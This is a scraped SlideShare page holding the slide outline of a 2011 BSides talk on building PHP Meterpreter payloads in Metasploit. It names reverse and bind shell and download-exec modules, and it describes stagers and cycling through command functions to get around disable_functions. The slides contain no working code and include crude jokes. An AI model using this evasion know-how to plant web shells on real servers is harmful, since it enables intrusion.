• Like
Beyond r57
Upcoming SlideShare
Loading in...5

Thanks for flagging this SlideShare!

Oops! An error has occurred.


Presented at BSides Las Vegas, 2011

Presented at BSides Las Vegas, 2011

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads


Total Views
On SlideShare
From Embeds
Number of Embeds



Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. Beyond r57egypt@metasploit.com
  • 2. Outline
  • 3. PHP Background• It’s terrible• It’s always been terrible• Objects are an afterthought• Function names aren’t consistent
  • 4. Why bother?• They have to be uploaded and configured – Leaves logs, files on disk• Some call home to the authors• They all focus on the server – Maybe the database, too• Nothing looks beyond, to the network
  • 5. Rome Wasn’t Sacked in a Day• Build payloads from simple -> complex
  • 6. Essence of Payloads• Create form of communication• Do your bidding
  • 7. Simplest: Exec• Just run a system command• Don’t care about input/output• php/exec
  • 8. Slightly Less Simple: download-exec• Go grab an executable from a listening webserver• Save it to disk and run it• Still don’t care about input/output• php/download_exec
  • 9. More Complex: shell• Need to have a comm channel• Listen for input and send back output• php/reverse_tcp• php/bind_tcp
  • 10. Meterpreter• Flexible, extensible, capable• php/meterpreter/reverse_tcp• php/meterpreter/bind_tcp
  • 11. Meterpreter for Pwned Home Pages• Doesn’t have to be on disk• Uses the same protocol and extension system – The existing client works just fine• Does as much as possible w/o using a shell – Works in a chroot, doesn’t require /bin/sh• Platform independent; works anywhere PHP works
  • 12. Meterpreter Required Reading• “Beyond EIP” 2006 – skape and spoonm, Blackhat Federal• “Hacking Macs for Fun and Profit” 2009 – Dino dai Zovi and Charlie Miller, CanSecWest
  • 13. Why is Meterpreter cool?• Works even in restrictive environments• Not limited to installed commands• If it has more access, it can do cooler stuff• Programmatically automatable
  • 14. Meterpreter screenie
  • 15. Meterpreter• Flexible extension system• Uses a (mostly) binary protocol – TLV (Type, Length, Value) – Designed for extensibility
  • 16. Meterpreter Protocol4 bytes 4 bytes ($length - 8) bytesLength Type Value ….. Length Type Value …..
  • 17. Meterpreter Protocol• Packets are themselves TLVs• TLVs make parsing simple and flexible – No formatting knowledge is required outside of the TLV structure – Allows a core packet parsing engine without any knowledge of extensions or their protocols
  • 18. Meterpreter Ruby API• Powerful and flexible scripting capabilities• Extensions create an attribute under the main client object• Various bits of info in each extension – client.sys.config.sysinfo – client.net.socket.create_tcp_client_channel
  • 19. Challenges of doing all this in PHP
  • 20. Liabilities• Magic Quotes• Size restrictions• Safe mode• disable_functions setting in php.ini• PHP Quirks
  • 21. We Don’t Need No Stinking Quotes
  • 22. Size Restrictions• URL length is limited to 4000 bytes on Apache• Total length of an HTTP header value is 8190• Solution is the same as for other kinds of shellcode: stagers – Setup some kind of communication with the attacker, read in more code, eval
  • 23. Safe Mode• Kind of a bummer for some things• Restricts files and command exec• Doesn’t limit sockets in any way
  • 24. disable_functions setting• Sucks• Can try a bunch of different functions with similar purposes until one works – shell_exec -> passthru -> system -> popen …• Esser’s memory corruption fu
  • 25. PHP Quirks• Stream vs Socket Resources – stream_select() vs socket_select()• Operator precedence – $var & CONST == CONST – $var & (CONST == CONST) – $var & 1• Can’t assume to have > version 4.3
  • 26. Assets• Many ways of doing the same thing – System Commands, Sockets• Your brains, his strength, my steel.
  • 27. Running System Commands• system, exec, popen, pctl_open, shell_exec, passthru, proc_open• A few non-default extensions: perl, win32std, win32services, almost certainly others
  • 28. Communications• Use the webserver – Simple, effective. Most existing payloads do this – Leaves logs =(• Programs on the system: nc, bash, ftp, … – No guarantee they’ll be there or work• Sockets
  • 29. Sockets• fsockopen, pfsockopen, socket_create, stream_socket, fopen• Extensions: curl, perl (wtf?)
  • 30. Files• fopen is usually enough – Nobody disables it because it would break everything
  • 31. Future• Javaterpreter, JSPterpreter – Already in the works, written by mihi• ASPterpreter?• Macterpreter/POSIX Meterpreter – Most of the code is there but is not really usable
  • 32. What should I call it?• PHP Meterpreter, php-terpreter• meterphpreter (pronounced “meterfpreter”)• phpterpreter (pronounced “fapterpreter”)• phpsucksmyballsterpreter
  • 33. Demos
  • 34. Questions8=====D